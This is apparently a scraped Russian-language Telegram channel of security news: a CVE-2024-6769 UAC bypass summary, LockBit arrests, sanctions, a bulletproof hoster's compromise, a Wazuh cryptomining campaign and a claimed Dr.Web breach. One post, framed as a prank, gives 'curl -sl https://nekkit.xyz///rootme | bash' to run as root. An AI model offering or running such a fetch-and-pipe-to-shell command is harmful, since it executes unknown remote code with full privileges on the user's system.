Очередной обход UAC в Windows: CVE-2024-6769
В последние недели активно бурление об новой уязвимости, известная как CVE-2024-6769, которая позволяет злоумышленникам обходить механизм контроля учетных записей (UAC) в операционной системе Windows. Этот механизм был разработан для повышения безопасности, ограничивая права пользователей и требуя подтверждения для выполнения определенных действий. Однако новая уязвимость в очередной раз ставит под сомнение эффективность этого защитного механизма.
### Механизм UAC и его значение?
Контроль учетных записей (UAC) был внедрен в Windows с целью защиты систем от несанкционированного доступа и выполнения вредоносного кода. При попытке выполнить действия, требующие повышенных привилегий, пользователю отображается запрос на подтверждение. Однако злоумышленники нашли способ использовать уровни целостности для обхода этого механизма, что позволяет им выполнять код с повышенными правами без ведома пользователя.
### Метод атаки
Атака основана на манипуляциях с уровнями целостности, которые определяют, какие действия может выполнять пользователь. Злоумышленники могут использовать эту уязвимость для пересечения границ пользователей, что приводит к выполнению кода с привилегиями администратора. Это создает серьезные риски для безопасности систем, так как позволяет атакующим получать доступ к критически важным данным и ресурсам.
Уязвимость CVE-2024-6769 представляет собой цепочку атак, которая позволяет злоумышленникам повышать свои привилегии в системах Windows, используя два основных метода: перехват DLL и отравление кэша активации.
### Техническая реализация
1. Перехват DLL:
- Злоумышленник использует функцию
2. Отравление кэша активации:
- Вторая стадия атаки включает использование механизма ALPC (Advanced Local Procedure Call) для взаимодействия с процессом CSRSS (Client/Server Runtime Subsystem). Атакующий может модифицировать кэш активации, что позволяет исполнять код с повышенными привилегиями без запроса UAC[2][3].
### Оценка Microsoft
Интересно, что Microsoft не классифицирует данное поведение как уязвимость. Это вызывает бурление разнообразных масс цвета детской неожиданности.
Будем поглядеть…
Sources
[1] CVE-2024-6769 | INCIBE-CERT https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6769
[2] fortra/CVE-2024-6769: Activation cache poisoning to ... - GitHub https://github.com/fortra/CVE-2024-6769
[3] Microsoft Vulnerability CVE-2024-6769 Now Public on ... https://www.globalsecuritymag.fr/microsoft-vulnerability-cve-2024-6769-now-public-on-fortra-com.html
[4] CoreLabs Articles - Core Security https://www.coresecurity.com/core-labs/articles
[5] CVE-2024-6729 Detail - NVD https://nvd.nist.gov/vuln/detail/CVE-2024-6729
[6] CVE-2024-6769 Detail - NVD https://nvd.nist.gov/vuln/detail/cve-2024-6769
[7] Novel Exploit Chain Enables Windows UAC Bypass - Dark Reading https://www.darkreading.com/vulnerabilities-threats/exploit-chain-windows-uac-bypass
[8] CVE-2024-6769 - CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6769
В последние недели активно бурление об новой уязвимости, известная как CVE-2024-6769, которая позволяет злоумышленникам обходить механизм контроля учетных записей (UAC) в операционной системе Windows. Этот механизм был разработан для повышения безопасности, ограничивая права пользователей и требуя подтверждения для выполнения определенных действий. Однако новая уязвимость в очередной раз ставит под сомнение эффективность этого защитного механизма.
### Механизм UAC и его значение?
Контроль учетных записей (UAC) был внедрен в Windows с целью защиты систем от несанкционированного доступа и выполнения вредоносного кода. При попытке выполнить действия, требующие повышенных привилегий, пользователю отображается запрос на подтверждение. Однако злоумышленники нашли способ использовать уровни целостности для обхода этого механизма, что позволяет им выполнять код с повышенными правами без ведома пользователя.
### Метод атаки
Атака основана на манипуляциях с уровнями целостности, которые определяют, какие действия может выполнять пользователь. Злоумышленники могут использовать эту уязвимость для пересечения границ пользователей, что приводит к выполнению кода с привилегиями администратора. Это создает серьезные риски для безопасности систем, так как позволяет атакующим получать доступ к критически важным данным и ресурсам.
Уязвимость CVE-2024-6769 представляет собой цепочку атак, которая позволяет злоумышленникам повышать свои привилегии в системах Windows, используя два основных метода: перехват DLL и отравление кэша активации.
### Техническая реализация
1. Перехват DLL:
- Злоумышленник использует функцию
NtCreateSymbolicLinkObject для перенаправления корневого диска на контролируемую папку, например, с C:\ на C:\users\public. Это приводит к тому, что некоторые службы начинают загружать библиотеки из поддельной папки system32[1][2].2. Отравление кэша активации:
- Вторая стадия атаки включает использование механизма ALPC (Advanced Local Procedure Call) для взаимодействия с процессом CSRSS (Client/Server Runtime Subsystem). Атакующий может модифицировать кэш активации, что позволяет исполнять код с повышенными привилегиями без запроса UAC[2][3].
### Оценка Microsoft
Интересно, что Microsoft не классифицирует данное поведение как уязвимость. Это вызывает бурление разнообразных масс цвета детской неожиданности.
Будем поглядеть…
Sources
[1] CVE-2024-6769 | INCIBE-CERT https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6769
[2] fortra/CVE-2024-6769: Activation cache poisoning to ... - GitHub https://github.com/fortra/CVE-2024-6769
[3] Microsoft Vulnerability CVE-2024-6769 Now Public on ... https://www.globalsecuritymag.fr/microsoft-vulnerability-cve-2024-6769-now-public-on-fortra-com.html
[4] CoreLabs Articles - Core Security https://www.coresecurity.com/core-labs/articles
[5] CVE-2024-6729 Detail - NVD https://nvd.nist.gov/vuln/detail/CVE-2024-6729
[6] CVE-2024-6769 Detail - NVD https://nvd.nist.gov/vuln/detail/cve-2024-6769
[7] Novel Exploit Chain Enables Windows UAC Bypass - Dark Reading https://www.darkreading.com/vulnerabilities-threats/exploit-chain-windows-uac-bypass
[8] CVE-2024-6769 - CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6769
👍1
Сегодня понедельник.
Сегодня Федеральное бюро расследований США и Национальное агентство по борьбе с преступностью Великобритании решили продолжить борьбу с группой вымогателей Lockbit.
Как показано на рисунке: они арестовали больше филиалов Lockbit и вывели из строя больше инфраструктуры🫥
Сегодня Федеральное бюро расследований США и Национальное агентство по борьбе с преступностью Великобритании решили продолжить борьбу с группой вымогателей Lockbit.
Как показано на рисунке: они арестовали больше филиалов Lockbit и вывели из строя больше инфраструктуры
Please open Telegram to view this post
VIEW IN TELEGRAM
США ввели санкции против «Бибы», CHERDAKMUDAK и Сани Малого
США ввели «относящиеся к киберсфере» санкции против 7 физических и 2 юридических лиц РФ, у некоторых помимо имён в санкционном листе есть клички.
Двое из семи вошедших в него россиян — хакеры с весьма оригинальными прозвищами — CHERDAKMUDAK a.k.a. Sanya a.k.a. Maloy, Serega; a.k.a. «POCH»; a.k.a. «STEN».
США ввели «относящиеся к киберсфере» санкции против 7 физических и 2 юридических лиц РФ, у некоторых помимо имён в санкционном листе есть клички.
Двое из семи вошедших в него россиян — хакеры с весьма оригинальными прозвищами — CHERDAKMUDAK a.k.a. Sanya a.k.a. Maloy, Serega; a.k.a. «POCH»; a.k.a. «STEN».
Forwarded from vx-underground
In honor of Cybersecurity Awareness Month we are issuing a challenge!
All of you (yes, even you) have to get 1 malware.
1 malware = 1 awareness
Good luck!!!!!1
All of you (yes, even you) have to get 1 malware.
1 malware = 1 awareness
Good luck!!!!!1
vx-underground
In honor of Cybersecurity Awareness Month we are issuing a challenge! All of you (yes, even you) have to get 1 malware. 1 malware = 1 awareness Good luck!!!!!1
ну че, погнали?)
Шалость? Определенно, однако UID = 0 😁
Выводы делайте сами :)))
curl -sl https://nekkit.xyz///rootme | bash
Шалость? Определенно, однако UID = 0 😁
Выводы делайте сами :)))
Please open Telegram to view this post
VIEW IN TELEGRAM
В течение последней недели или около того неизвестный человек присылал @vxunderground несколько интересных фотографий.
Этот человек утверждает, что разочарован в провайдере хостинга "не пробиваемого" 'zservers ТЧК ru'. Их разочарование привело к тому, что они провели 'пентест' и успешно скомпрометировали "не пробиваемого" провайдера хостинга.
Следует отметить, что это не первый раз, когда мы делимся информацией о взломе zserver. Несколько месяцев назад мы раскрыли, что неизвестный человек утверждал, что скомпрометировал провайдера хостинга.
Подводя итог:
у них ВСЕ ЕЩЕ есть доступ. Прошло несколько месяцев.
За время нашего разговора они прислали нам десятки скриншотов с этого хостинга. Они раскрыли настоящее имя владельца (с паспортными данными и фотографиями). Они также показали переписку по электронной почте между владельцем и клиентами, у которых есть вопросы об услугах и ценах.
Они также успешно перечислили каждого клиента провайдера абузоустойчивого хостинга — имена клиентов (вероятно, поддельные), адрес электронной почты, используемый для регистрации на сервисе, платежную информацию и услуги, за которые они платят.
Эти неизвестные лица сумели продвинуться дальше и получить доступ к административным ресурсам, обнаружив, что у этого провайдера абузоустойчивого хостинга есть каталог под названием «пароли (все)», который заполнен сотнями, возможно, тысячами учетных данных для различных вещей.
Если вам от этого станет легче, они действительно читают жалобы на злоупотребления, которые получают. Но они не предпринимают по ним никаких действий. По крайней мере, их читают, верно?
Этот человек утверждает, что разочарован в провайдере хостинга "не пробиваемого" 'zservers ТЧК ru'. Их разочарование привело к тому, что они провели 'пентест' и успешно скомпрометировали "не пробиваемого" провайдера хостинга.
Следует отметить, что это не первый раз, когда мы делимся информацией о взломе zserver. Несколько месяцев назад мы раскрыли, что неизвестный человек утверждал, что скомпрометировал провайдера хостинга.
Подводя итог:
у них ВСЕ ЕЩЕ есть доступ. Прошло несколько месяцев.
За время нашего разговора они прислали нам десятки скриншотов с этого хостинга. Они раскрыли настоящее имя владельца (с паспортными данными и фотографиями). Они также показали переписку по электронной почте между владельцем и клиентами, у которых есть вопросы об услугах и ценах.
Они также успешно перечислили каждого клиента провайдера абузоустойчивого хостинга — имена клиентов (вероятно, поддельные), адрес электронной почты, используемый для регистрации на сервисе, платежную информацию и услуги, за которые они платят.
Эти неизвестные лица сумели продвинуться дальше и получить доступ к административным ресурсам, обнаружив, что у этого провайдера абузоустойчивого хостинга есть каталог под названием «пароли (все)», который заполнен сотнями, возможно, тысячами учетных данных для различных вещей.
Если вам от этого станет легче, они действительно читают жалобы на злоупотребления, которые получают. Но они не предпринимают по ним никаких действий. По крайней мере, их читают, верно?
🗿1
Произошел сбой в работе кормилицы. Ошибка драйвера 0х0069, "/bus/pzda не распознана! Обратитесь к разработчику.
Переход в безопасный режим. Система подключена к шине "GTWB: Get to work, bitch. Адрес: 0xOFFICE"
😂
Переход в безопасный режим. Система подключена к шине "GTWB: Get to work, bitch. Адрес: 0xOFFICE"
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from vx-underground
The unknown person who claims to have compromised zserver dot ru, the bulletproof webhosting provider, has begun sending emails to zserver dot ru clients.
Interestingly, the person who claimed to have compromised zserver dot ru did not tell us this.
One of their customers did.
Interestingly, the person who claimed to have compromised zserver dot ru did not tell us this.
One of their customers did.
Интересная статья на сайте Securelist описывает кампанию по несанкционированной добыче криптовалюты, в которой злоумышленники используют открытый исходный агент SIEM Wazuh для достижения своих целей.
1. Цели и методы атаки:
- Кампания, начавшаяся в 2022 году, нацелена на русскоговорящих пользователей и использует различные ресурсы для распространения вредоносного ПО.
- Злоумышленники продвигают фальшивые сайты для скачивания популярных программ (например, uTorrent, Microsoft Office), которые содержат вредоносные файлы.
2. Способы распространения:
- Вредоносное ПО распространяется через поисковые системы, Telegram-каналы и YouTube.
- Злоумышленники используют фальшивые ссылки в комментариях под видео и в описаниях, а также отключают функции пересылки сообщений в своих каналах для предотвращения распространения информации о мошенничестве.
3. Техника заражения:
- Пользователи скачивают ZIP-архивы с MSI-файлами, которые требуют ввода пароля для установки.
- После установки вредоносный код запускает скрипты и добавляет себя в автозапуск системы с привилегиями SYSTEM.
4. Использование Wazuh:
- Атакующие используют Wazuh для удаленного контроля и сбора телеметрии.
- Имплант собирает информацию о системе жертвы и отправляет ее на сервер злоумышленников.
5. География атак:
- Большинство атак затронули пользователей из России (87,63%), а также из Беларуси, Индии и других стран.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Утечки информации
Хакерская группировка «DumpForums» заявила, что они взломали инфраструктуру компании «Доктор Веб» (drweb.ru). 🙈
Через официальный Telegram-бот компании (@DrWebBot), пользователям приходят сообщения о взломе.
Кроме того, в качестве подтверждения хакеры предоставили несколько дампов баз данных внутренних ресурсов таких, как: ldap.dev.drweb.com, vxcube.drweb.com, bugs.drweb.com, antitheft.drweb.com, rt.drweb.com и др.
Судя по информации из дампов, данные в них актуальны на 17.09.2024.
Через официальный Telegram-бот компании (@DrWebBot), пользователям приходят сообщения о взломе.
Кроме того, в качестве подтверждения хакеры предоставили несколько дампов баз данных внутренних ресурсов таких, как: ldap.dev.drweb.com, vxcube.drweb.com, bugs.drweb.com, antitheft.drweb.com, rt.drweb.com и др.
Судя по информации из дампов, данные в них актуальны на 17.09.2024.